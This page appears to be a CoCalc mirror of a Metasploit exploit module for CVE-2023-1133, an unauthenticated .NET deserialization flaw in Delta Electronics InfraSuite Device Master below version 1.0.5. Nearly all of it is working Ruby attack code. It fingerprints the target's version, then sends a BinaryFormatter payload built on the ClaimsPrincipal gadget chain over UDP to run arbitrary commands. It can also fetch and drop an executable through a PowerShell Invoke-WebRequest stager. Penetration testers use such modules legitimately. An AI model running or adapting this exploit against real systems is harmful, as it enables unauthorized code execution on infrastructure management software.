CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
Views: 1904
1
# This module requires Metasploit: https://metasploit.com/download

2
# Current source: https://github.com/rapid7/metasploit-framework

3


4
class MetasploitModule < Msf::Exploit::Remote

5


6
  Rank = ExcellentRanking

7


8
  include Msf::Exploit::CmdStager

9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::Remote::Udp

11
  prepend Msf::Exploit::Remote::AutoCheck

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Delta Electronics InfraSuite Device Master Deserialization',

18
        'Description' => %q{

19
          Delta Electronics InfraSuite Device Master versions below v1.0.5 have an

20
          unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'

21
          method of the 'Device-Gateway-Status' process.

22


23
          The 'ParseUDPPacket()' method reads user-controlled packet data and eventually

24
          calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,

25
          leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.

26
        },

27
        'Author' => [

28
          'Anonymous', # Vulnerability discovery

29
          'Shelby Pace' # Metasploit module

30
        ],

31
        'License' => MSF_LICENSE,

32
        'References' => [

33
          ['CVE', '2023-1133'],

34
          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/'],

35
          ['URL', 'https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133']

36
        ],

37
        'Platform' => 'win',

38
        'Privileged' => false,

39
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],

40
        'Targets' => [

41
          [

42
            'Windows EXE Dropper',

43
            {

44
              'Arch' => [ARCH_X86, ARCH_X64],

45
              'Type' => :windows_dropper,

46
              'CmdStagerFlavor' => :psh_invokewebrequest

47
            }

48
          ],

49
          [

50
            'Windows CMD',

51
            {

52
              'Arch' => [ARCH_CMD],

53
              'Type' => :windows_cmd

54
            }

55
          ],

56
        ],

57
        'DefaultTarget' => 0,

58
        'DisclosureDate' => '2023-05-17',

59
        'Notes' => {

60
          'Stability' => [CRASH_SAFE],

61
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS],

62
          'Reliability' => [REPEATABLE_SESSION]

63
        }

64
      )

65
    )

66


67
    register_options([

68
      Opt::RPORT(10100),

69
      OptInt.new('INFRASUITE_PORT', [ true, 'The port on which the InfraSuite Manager is listening', 80 ]),

70
      OptString.new('TARGETURI', [ true, 'The base path to the InfraSuite Manager', '/' ])

71
    ])

72
  end

73


74
  def check

75
    print_status('Requesting the login page to determine if target is InfraSuite Device Master...')

76
    res = send_request_cgi(

77
      'method' => 'GET',

78
      'rport' => datastore['INFRASUITE_PORT'],

79
      'uri' => normalize_uri(target_uri.path, 'login.html')

80
    )

81


82
    return CheckCode::Unknown unless res

83


84
    unless res.body.include?('InfraSuite Manager Login')

85
      return CheckCode::Safe('Target does not appear to be InfraSuite Device Master.')

86
    end

87


88
    print_status('Target is InfraSuite Device Master. Now attempting to determine version.')

89
    res = send_request_cgi(

90
      'method' => 'GET',

91
      'rport' => datastore['INFRASUITE_PORT'],

92
      'uri' => normalize_uri(target_uri.path, 'js/webcfg.js')

93
    )

94


95
    unless res&.body&.include?('var devicemasterCfg')

96
      return CheckCode::Detected('Discovered InfraSuite Device Master, but couldn\'t determine version.')

97
    end

98


99
    version = res.body.match(/version:'(\d+(?:\.\d+)+[a-zA-Z]?)'/)

100
    unless version && version.length > 1

101
      return CheckCode::Detected('Failed to find version string')

102
    end

103


104
    version = version[1]

105
    vprint_status("Found version '#{version}' of InfraSuite Device Master")

106
    r_vers = Rex::Version.new(version)

107


108
    return CheckCode::Appears if r_vers < Rex::Version.new('1.0.5')

109


110
    CheckCode::Safe

111
  end

112


113
  def exploit

114
    connect_udp

115
    case target['Type']

116
    when :windows_dropper

117
      execute_cmdstager

118
    when :windows_cmd

119
      execute_command(payload.encoded)

120
    end

121
  end

122


123
  def execute_command(cmd, _opts = {})

124
    serialized = ::Msf::Util::DotNetDeserialization.generate(

125
      cmd,

126
      gadget_chain: :ClaimsPrincipal,

127
      formatter: :BinaryFormatter

128
    )

129


130
    pkt = "\x01#{[ serialized.length ].pack('n')}#{serialized}"

131
    udp_sock.put(pkt)

132
  end

133


134
  def cleanup

135
    disconnect_udp

136
  end

137
end

138


139